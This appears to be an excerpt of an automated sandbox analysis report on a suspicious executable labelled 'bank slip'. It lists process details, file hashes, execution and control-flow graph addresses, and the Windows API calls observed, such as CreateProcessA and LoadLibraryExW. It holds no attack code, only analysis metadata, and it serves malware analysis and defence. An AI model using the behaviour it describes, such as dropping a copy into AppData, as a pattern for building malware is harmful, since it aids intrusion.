                                                                    Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                    Imagebase:0xec0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 0%, Virustotal, Browse
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:08:13:07
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:08:13:16
                                                                    Start date:06/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                    Imagebase:0xb0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:08:13:16
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true


Execution Graph

Execution Coverage: 11.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 3.4%
Total number of Nodes: 147
Total number of Limit Nodes: 9
                                                                      execution_graph 33429 2594668 33430 2594672 33429->33430 33434 2594759 33429->33434 33439 2594218 33430->33439 33432 259468d 33435 259477d 33434->33435 33443 2594859 33435->33443 33447 2594868 33435->33447 33440 2594223 33439->33440 33455 2597d14 33440->33455 33442 2597fdc 33442->33432 33445 259488f 33443->33445 33444 259496c 33445->33444 33451 25944e0 33445->33451 33449 259488f 33447->33449 33448 259496c 33448->33448 33449->33448 33450 25944e0 CreateActCtxA 33449->33450 33450->33448 33452 25958f8 CreateActCtxA 33451->33452 33454 25959bb 33452->33454 33456 2597d1f 33455->33456 33459 2597d74 33456->33459 33458 25981fd 33458->33442 33460 2597d7f 33459->33460 33461 2597da4 CreateWindowExW 33460->33461 33462 25986ea 33461->33462 33462->33458 33463 259b618 33466 259b700 33463->33466 33464 259b627 33467 259b721 33466->33467 33468 259b744 33466->33468 33467->33468 33474 259b999 33467->33474 33478 259b9a8 33467->33478 33468->33464 33469 259b73c 33469->33468 33470 259b948 GetModuleHandleW 33469->33470 33471 259b975 33470->33471 33471->33464 33475 259b9bc 33474->33475 33476 259b9e1 33475->33476 33482 259ac60 33475->33482 33476->33469 33479 259b9bc 33478->33479 33480 259ac60 LoadLibraryExW 33479->33480 33481 259b9e1 33479->33481 33480->33481 33481->33469 33483 259bb88 LoadLibraryExW 33482->33483 33485 259bc01 33483->33485 33485->33476 33486 259d998 33487 259d9de 33486->33487 33490 259db78 33487->33490 33493 259ce80 33490->33493 33494 259dbe0 DuplicateHandle 33493->33494 33495 259dacb 33494->33495 33502 6a12f40 33505 6a12f5a 33502->33505 33503 6a12f7e 33505->33503 33506 6a133c5 33505->33506 33509 68afc30 33506->33509 33507 6a133f5 33510 68afcb9 CreateProcessA 33509->33510 33512 68afe7b 33510->33512 33513 6a141d0 33514 6a1435b 33513->33514 33515 6a141f6 33513->33515 33515->33514 33517 6a12680 33515->33517 33518 6a14450 PostMessageW 33517->33518 33519 6a144bc 33518->33519 33519->33515 33353 4ba7c98 33354 
4ba7cc7 33353->33354 33361 4ba73ec 33354->33361 33356 4ba7d2e 33358 4ba8493 33356->33358 33366 259873b 33356->33366 33370 2597da4 33356->33370 33357 4ba958c 33362 4ba73f7 33361->33362 33364 259873b CreateWindowExW 33362->33364 33365 2597da4 CreateWindowExW 33362->33365 33363 4ba958c 33363->33356 33364->33363 33365->33363 33367 2598773 33366->33367 33374 2598290 33367->33374 33369 25987e5 33369->33357 33371 2597daf 33370->33371 33372 2598290 CreateWindowExW 33371->33372 33373 25987e5 33372->33373 33373->33357 33375 259829b 33374->33375 33376 2598f61 33375->33376 33378 259d6d0 33375->33378 33376->33369 33379 259d6f1 33378->33379 33380 259d715 33379->33380 33382 259d880 33379->33382 33380->33376 33383 259d88d 33382->33383 33385 259d8c7 33383->33385 33386 259cdb8 33383->33386 33385->33380 33387 259cdc3 33386->33387 33389 259e5e0 33387->33389 33390 259e1a0 33387->33390 33391 259e1ab 33390->33391 33392 2598290 CreateWindowExW 33391->33392 33393 259e64f 33392->33393 33397 4ba0443 33393->33397 33403 4ba0448 33393->33403 33394 259e689 33394->33389 33399 4ba0479 33397->33399 33400 4ba0579 33397->33400 33398 4ba0485 33398->33394 33399->33398 33409 4ba128f 33399->33409 33414 4ba12a0 33399->33414 33400->33394 33404 4ba0579 33403->33404 33406 4ba0479 33403->33406 33404->33394 33405 4ba0485 33405->33394 33406->33405 33407 4ba128f CreateWindowExW 33406->33407 33408 4ba12a0 CreateWindowExW 33406->33408 33407->33404 33408->33404 33410 4ba12cb 33409->33410 33411 4ba137a 33410->33411 33419 4ba2180 33410->33419 33422 4ba2170 33410->33422 33415 4ba12cb 33414->33415 33416 4ba137a 33415->33416 33417 4ba2180 CreateWindowExW 33415->33417 33418 4ba2170 CreateWindowExW 33415->33418 33417->33416 33418->33416 33425 4ba0190 33419->33425 33423 4ba21b5 33422->33423 33424 4ba0190 CreateWindowExW 33422->33424 33423->33411 33424->33423 33426 4ba21d0 CreateWindowExW 33425->33426 33428 4ba22f4 33426->33428 33328 9fd01c 33329 9fd034 33328->33329 33330 9fd08e 33329->33330 33335 4ba237b 33329->33335 33339 
4ba01bc 33329->33339 33343 4ba30e8 33329->33343 33347 4ba2388 33329->33347 33336 4ba23ae 33335->33336 33337 4ba01bc CallWindowProcW 33336->33337 33338 4ba23cf 33337->33338 33338->33330 33340 4ba01c7 33339->33340 33342 4ba3149 33340->33342 33351 4ba02e4 CallWindowProcW 33340->33351 33345 4ba3125 33343->33345 33346 4ba3149 33345->33346 33352 4ba02e4 CallWindowProcW 33345->33352 33348 4ba23ae 33347->33348 33349 4ba01bc CallWindowProcW 33348->33349 33350 4ba23cf 33349->33350 33350->33330 33351->33342 33352->33346 33496 4ba4771 33497 4ba488c 33496->33497 33498 4ba47e2 33496->33498 33500 4ba01bc CallWindowProcW 33497->33500 33499 4ba483a CallWindowProcW 33498->33499 33501 4ba47e9 33498->33501 33499->33501 33500->33501

Control-flow Graph

                                                                      control_flow_graph 311 4ba7c98-4ba7fdc call 4ba73ec call 4ba73fc call 4ba7688 * 2 call 4ba73fc call 4ba7688 * 4 call 4ba7698 * 2 call 4ba76a8 call 4ba76b8 375 4ba7fe2-4ba800b 311->375 376 4ba8135-4ba841d call 4ba76c8 call 4ba76d8 call 4ba76e8 call 4ba76f8 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba7738 call 4ba39f4 311->376 379 4ba802d-4ba8039 375->379 380 4ba800d-4ba801b 375->380 382 4ba9459-4ba9585 376->382 516 4ba8423-4ba843c 376->516 385 4ba803b 379->385 386 4ba806f-4ba807b 379->386 380->382 383 4ba8021-4ba802b 380->383 717 4ba9587 call 259873b 382->717 718 4ba9587 call 2597da4 382->718 383->379 383->380 387 4ba803e-4ba8057 385->387 388 4ba807d-4ba8086 386->388 389 4ba80c3-4ba80cf 386->389 387->382 392 4ba805d-4ba806d 387->392 393 4ba8089-4ba80ab 388->393 389->382 394 4ba80d5-4ba80fd 389->394 392->386 392->387 393->382 397 4ba80b1-4ba80c1 393->397 394->382 395 4ba8103-4ba812f 394->395 395->375 395->376 397->389 397->393 411 4ba958c-4ba9594 414 4ba959a-4ba969e call 4ba7b4c * 6 411->414 415 4ba96a3-4ba96aa 411->415 421 4ba9759-4ba9785 414->421 415->421 422 4ba96b0-4ba96e5 415->422 428 4ba97be-4ba97cc call 4ba7b6c 421->428 429 4ba9787-4ba97a2 call 4ba7b5c 421->429 422->421 455 4ba96e7-4ba9751 422->455 439 4ba97d8 428->439 440 4ba97ce-4ba97d6 428->440 429->428 450 4ba97a4-4ba97b6 429->450 444 4ba97da-4ba97dc 439->444 440->444 448 4ba97de-4ba97e7 call 4ba7b5c 444->448 449 4ba97ec-4ba986a call 4ba7b5c 444->449 448->449 722 4ba986d call 4baac5a 449->722 723 4ba986d call 4baac68 449->723 450->428 455->421 497 4ba9870-4ba9886 501 4ba9888-4ba98a0 497->501 502 4ba98a6-4ba98d5 call 4ba7b7c 497->502 501->502 719 4ba98da call 4baccef 502->719 720 4ba98da call 4bacd00 502->720 721 4ba98da call 4bacd86 502->721 514 4ba98df-4ba98e6 516->382 518 4ba8442-4ba8472 516->518 518->382 521 4ba8478-4ba848d 518->521 521->382 523 4ba8493-4ba84c6 521->523 526 4ba84cc-4ba856b call 4ba7748 523->526 535 4ba856d-4ba8573 
526->535 536 4ba8583-4ba9458 call 4ba7758 call 4ba7768 * 3 call 4ba7748 call 4ba7758 call 4ba7768 call 4ba7778 call 4ba7788 call 4ba7768 call 4ba7798 call 4ba7748 call 4ba7768 call 4ba7798 call 4ba7778 call 4ba7788 call 4ba7768 call 4ba7798 call 4ba7768 call 4ba7798 call 4ba7758 call 4ba7768 call 4ba7758 call 4ba7768 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba77a8 call 4ba77b8 call 4ba77c8 call 4ba77d8 call 4ba77e8 call 4ba77f8 call 4ba7884 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba7738 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba7738 call 4ba7894 call 4ba78a4 call 4ba78b4 call 4ba78c4 call 4ba78d4 call 4ba7884 * 3 call 4ba78e4 call 4ba7718 call 4ba78f4 * 2 526->536 537 4ba8577-4ba8579 535->537 538 4ba8575 535->538 537->536 538->536 717->411 718->411 719->514 720->514 721->514 722->497 723->497
Strings
Memory Dump Source
• Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
Similarity
• API ID:
• String ID: ($($-$-$-$-$.$.$.$.$.$.$0$d$r
• API String ID: 0-3407198415
• Opcode ID: 3b72f0491fa1c29c8a1424ddb71e3ed5be63a31a1783d9dbfde8005aca8466b9
• Instruction ID: 5c67a05685036d68e3a459a765eb9b05aaff58613f7f0e6b8c8c6db91aaedefb
• Opcode Fuzzy Hash: 3b72f0491fa1c29c8a1424ddb71e3ed5be63a31a1783d9dbfde8005aca8466b9
• Instruction Fuzzy Hash: B403F334A142158FDB15DF28C894BD9B7B2FF89304F1585E9E909AB361DB31AE85CF80
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                      control_flow_graph 724 4ba7c70-4ba7c91 726 4ba7c42-4ba7c64 724->726 727 4ba7c93-4ba7d1b 724->727 735 4ba7d25-4ba7d29 call 4ba73ec 727->735 737 4ba7d2e-4ba7d63 call 4ba73fc 735->737 743 4ba7d6d-4ba7d71 call 4ba7688 737->743 745 4ba7d76-4ba7fdc call 4ba7688 call 4ba73fc call 4ba7688 * 4 call 4ba7698 * 2 call 4ba76a8 call 4ba76b8 743->745 792 4ba7fe2-4ba800b 745->792 793 4ba8135-4ba82a2 call 4ba76c8 call 4ba76d8 call 4ba76e8 call 4ba76f8 745->793 796 4ba802d-4ba8039 792->796 797 4ba800d-4ba801b 792->797 888 4ba82ac-4ba82b1 793->888 802 4ba803b 796->802 803 4ba806f-4ba807b 796->803 799 4ba9459-4ba9514 797->799 800 4ba8021-4ba802b 797->800 826 4ba951e-4ba9585 799->826 800->796 800->797 804 4ba803e-4ba8057 802->804 805 4ba807d-4ba8086 803->805 806 4ba80c3-4ba80cf 803->806 804->799 809 4ba805d-4ba806d 804->809 810 4ba8089-4ba80ab 805->810 806->799 811 4ba80d5-4ba80fd 806->811 809->803 809->804 810->799 814 4ba80b1-4ba80c1 810->814 811->799 812 4ba8103-4ba812f 811->812 812->792 812->793 814->806 814->810 1134 4ba9587 call 259873b 826->1134 1135 4ba9587 call 2597da4 826->1135 828 4ba958c-4ba9594 831 4ba959a-4ba969e call 4ba7b4c * 6 828->831 832 4ba96a3-4ba96aa 828->832 838 4ba9759-4ba9785 831->838 832->838 839 4ba96b0-4ba96e5 832->839 845 4ba97be-4ba97cc call 4ba7b6c 838->845 846 4ba9787-4ba97a2 call 4ba7b5c 838->846 839->838 872 4ba96e7-4ba9751 839->872 856 4ba97d8 845->856 857 4ba97ce-4ba97d6 845->857 846->845 867 4ba97a4-4ba97b6 846->867 861 4ba97da-4ba97dc 856->861 857->861 865 4ba97de-4ba97e7 call 4ba7b5c 861->865 866 4ba97ec-4ba985b call 4ba7b5c 861->866 865->866 912 4ba9864-4ba986a 866->912 867->845 872->838 891 4ba82b9-4ba8307 call 4ba7708 call 4ba7718 888->891 900 4ba830c-4ba8347 call 4ba7728 891->900 904 4ba834c-4ba83d0 call 4ba7738 call 4ba39f4 900->904 925 4ba83d7-4ba83ef 904->925 1139 4ba986d call 4baac5a 912->1139 1140 4ba986d call 4baac68 912->1140 914 4ba9870-4ba9879 917 4ba987f-4ba9886 
914->917 918 4ba9888-4ba98a0 917->918 919 4ba98a6-4ba98c1 917->919 918->919 927 4ba98ca-4ba98d5 call 4ba7b7c 919->927 926 4ba83f5-4ba8401 925->926 930 4ba840b-4ba8413 926->930 1136 4ba98da call 4baccef 927->1136 1137 4ba98da call 4bacd00 927->1137 1138 4ba98da call 4bacd86 927->1138 932 4ba8419-4ba841d 930->932 931 4ba98df-4ba98e6 932->799 933 4ba8423-4ba843c 932->933 933->799 935 4ba8442-4ba8472 933->935 935->799 938 4ba8478-4ba848d 935->938 938->799 940 4ba8493-4ba84aa 938->940 942 4ba84b4-4ba84c6 940->942 943 4ba84cc-4ba856b call 4ba7748 942->943 952 4ba856d-4ba8573 943->952 953 4ba8583-4ba9458 call 4ba7758 call 4ba7768 * 3 call 4ba7748 call 4ba7758 call 4ba7768 call 4ba7778 call 4ba7788 call 4ba7768 call 4ba7798 call 4ba7748 call 4ba7768 call 4ba7798 call 4ba7778 call 4ba7788 call 4ba7768 call 4ba7798 call 4ba7768 call 4ba7798 call 4ba7758 call 4ba7768 call 4ba7758 call 4ba7768 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba77a8 call 4ba77b8 call 4ba77c8 call 4ba77d8 call 4ba77e8 call 4ba77f8 call 4ba7884 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba7738 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba7738 call 4ba7894 call 4ba78a4 call 4ba78b4 call 4ba78c4 call 4ba78d4 call 4ba7884 * 3 call 4ba78e4 call 4ba7718 call 4ba78f4 * 2 943->953 954 4ba8577-4ba8579 952->954 955 4ba8575 952->955 954->953 955->953 1134->828 1135->828 1136->931 1137->931 1138->931 1139->914 1140->914
Strings
Memory Dump Source
• Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
Similarity
• API ID:
• String ID: ($($-$-$-$-$.$.$.$.$.$.$0$d$r
• API String ID: 0-3407198415
• Opcode ID: 758df12ca34f4340bda63c25c48016aa0cbcc968ced645a0b50d3d2f79dce8eb
• Instruction ID: b1d3c7f40b758c37d031331eb3a04cdc0cba50bdd4da04f36f1d115aa614b846
• Opcode Fuzzy Hash: 758df12ca34f4340bda63c25c48016aa0cbcc968ced645a0b50d3d2f79dce8eb
• Instruction Fuzzy Hash: 69E2D534A14219CFDB15DF28C894AD9B7B2FF89304F5585E9E909AB361DB31AE81CF40
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2075096399.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6a10000_bank slip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6175217b100708d097b9791f6139bca4ca46ed447a81a223019b14e2966caf0f
• Instruction ID: 64a95439a6da17432dc8b7799ce270b0b3c928e7120bd6f3ec997ee4fe93f360
• Opcode Fuzzy Hash: 6175217b100708d097b9791f6139bca4ca46ed447a81a223019b14e2966caf0f
• Instruction Fuzzy Hash: 01C19A70B016058FEB99EB79C960B6EB7E6EFC9700F144469D156CF290CB34E901CBA1
Uniqueness

Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075096399.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6a10000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a5aac4fa7def37e708f54016b694b9e1309f0b1d49809bcac66e9c04408b28f9
                                                                      • Instruction ID: 2bc4201d1b209c51843deed1c28f9131d747e3db2a5a91e928f937cb3134f6c9
                                                                      • Opcode Fuzzy Hash: a5aac4fa7def37e708f54016b694b9e1309f0b1d49809bcac66e9c04408b28f9
                                                                      • Instruction Fuzzy Hash: 47F0F934C09388CFDB10DFA4E08469CBFB0AF06315F21949AD51AAF141CBB559C98B21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075096399.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6a10000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e16432b2bc50289725f388e692c9e961822e1309a8eae2b23ad88dd252fdbcd
                                                                      • Instruction ID: e50c19ef4369c159cffc9273d8a46532794ca0aaf8e3f8ff6f636cbc016f3be8
                                                                      • Opcode Fuzzy Hash: 4e16432b2bc50289725f388e692c9e961822e1309a8eae2b23ad88dd252fdbcd
                                                                      • Instruction Fuzzy Hash: FED0627484D355CFEB51DF50E4845F5BBB9AB0E311F006095D50EDB211D7319585CE94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (function 68afc30-68aff74)
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 068AFE66
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0ddd8900f4be7d2e0ad59596a6b834118b4d1ecf4ddcc800a588bcd26141e2d5
                                                                      • Instruction ID: ff8f5f567eb0bfc5dee6a0950c3aaee1fed89beda1291420fa4c91dab571d2aa
                                                                      • Opcode Fuzzy Hash: 0ddd8900f4be7d2e0ad59596a6b834118b4d1ecf4ddcc800a588bcd26141e2d5
                                                                      • Instruction Fuzzy Hash: FB915971D003198FEB61DF69C841BEEBBB2BF49310F1485A9E909E7280DB749985CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (function 259b700-259b990)
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0259B966
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 12885ac9975fe04367bd886587da835d899934b4ab7d995e0b8cc0fa3d48f4b1
                                                                      • Instruction ID: 7f1583112e89df05e04973f3eb264b12f10cc8ef2c2de26ba74788c102673762
                                                                      • Opcode Fuzzy Hash: 12885ac9975fe04367bd886587da835d899934b4ab7d995e0b8cc0fa3d48f4b1
                                                                      • Instruction Fuzzy Hash: 2B8148B0A00B058FEB24DF29D44475ABBF2FF88314F108A2DD48ADBA50D735E949CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (function 4ba016a-4ba2341)
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BA22E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 51f5e0bc41cda105f2aaa14dbfb6a39cb9eb0efd9724dc956ed3df38fc451a61
                                                                      • Instruction ID: 823323396872f97aaca3d3bbcd06374c7bb46f17491700d47a2102c5bfd73eed
                                                                      • Opcode Fuzzy Hash: 51f5e0bc41cda105f2aaa14dbfb6a39cb9eb0efd9724dc956ed3df38fc451a61
                                                                      • Instruction Fuzzy Hash: 9051E0B1D14349AFDF14CF99C884ADEBBB5FF48314F24856AE818AB210D770A895CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (function 4ba0190-4ba2341)
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BA22E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: ab4465d7205be398147ef2a26e8c4ec4a59cfb716123732e21bc1efe439a7ba8
                                                                      • Instruction ID: a542b268a7274af2dde5ea0f066ee2df3ab86d9729d14373d36ef8eb8f068062
                                                                      • Opcode Fuzzy Hash: ab4465d7205be398147ef2a26e8c4ec4a59cfb716123732e21bc1efe439a7ba8
                                                                      • Instruction Fuzzy Hash: FA51CEB1D14309AFDB18CF99C884ADEBBB5FF48310F24856AE818AB210D770A855CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (function 4ba21cb-4ba2341)
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BA22E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 1a93d5febd124769ee4d88c516873ebfe036048b20c530c3c08a058d290fabf7
                                                                      • Instruction ID: 98cf0f9b6ca36009fd95fd19d9fc745d55f67da15ad2ed40135f879f3799cd51
                                                                      • Opcode Fuzzy Hash: 1a93d5febd124769ee4d88c516873ebfe036048b20c530c3c08a058d290fabf7
                                                                      • Instruction Fuzzy Hash: F341CDB5D103099FDF18CF99C984ADEBBB5FF48310F24856AE818AB210D770A895CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (function 25958ec-2595af4)
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 025959A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 7ebb68a90460fa0a96c1ac042eb18a3fdb072106c963da3d15a6e7eb2063605d
                                                                      • Instruction ID: 2e512ce45104a804e8ee903f80c93a50adff80cabb23d47b4c1426f6eb9ffc85
                                                                      • Opcode Fuzzy Hash: 7ebb68a90460fa0a96c1ac042eb18a3fdb072106c963da3d15a6e7eb2063605d
                                                                      • Instruction Fuzzy Hash: E341F2B0C00719CFDB25DFA9C884BCDBBB1BF49304F60806AD409AB251DB75694ACF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph (function 4ba02e4-4ba48bc)
                                                                      APIs
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04BA4861
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: CallProcWindow
                                                                      • String ID:
                                                                      • API String ID: 2714655100-0
                                                                      • Opcode ID: 3e0b669a5da58d3786d7680f786260dd96b9e08d0bb694d784d61a1a4b6a5774
                                                                      • Instruction ID: 650d4a4f91afd684b1526941a922e415eb169b35ddf9e21bd34d4a0a0a4c2a63
                                                                      • Opcode Fuzzy Hash: 3e0b669a5da58d3786d7680f786260dd96b9e08d0bb694d784d61a1a4b6a5774
                                                                      • Instruction Fuzzy Hash: 3B4138B5E002459FDB14CF99D888AAABBF5FF88314F24C499E519A7320D374A841CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 025959A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: b9c72454a8b75f60e30f60abb460e0c4d18d97860f2fdd780dc62c01ab1da4b0
                                                                      • Instruction ID: 8f2e9e91214300ac9a0909ccbbc22f6f63c4b0f6fb47de000cc48c378cea5dfd
                                                                      • Opcode Fuzzy Hash: b9c72454a8b75f60e30f60abb460e0c4d18d97860f2fdd780dc62c01ab1da4b0
                                                                      • Instruction Fuzzy Hash: 0A41FFB0C00719CFDB25DFA9C884B9EBBB5BF48304F60806AD408AB251DB716949CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e4dc47150a7cf1caa9ebbf332a129f923d7f0ec47a7e12cd02d5dc9c0e3e15cf
                                                                      • Instruction ID: 213aae869d3baec267a692fb499f92278d537a8d302b2495ebde5fb5fe4945e8
                                                                      • Opcode Fuzzy Hash: e4dc47150a7cf1caa9ebbf332a129f923d7f0ec47a7e12cd02d5dc9c0e3e15cf
                                                                      • Instruction Fuzzy Hash: 6131CDB0804649CFEF12DFA8C9947DDBBF1BF46314F90818AC405AB251E775A94ACB05
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0259DBA6,?,?,?,?,?), ref: 0259DC67
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: cdd924c9e89e0f42cc50db631eccf5439cb6248819bcf155c28c35d31e977d41
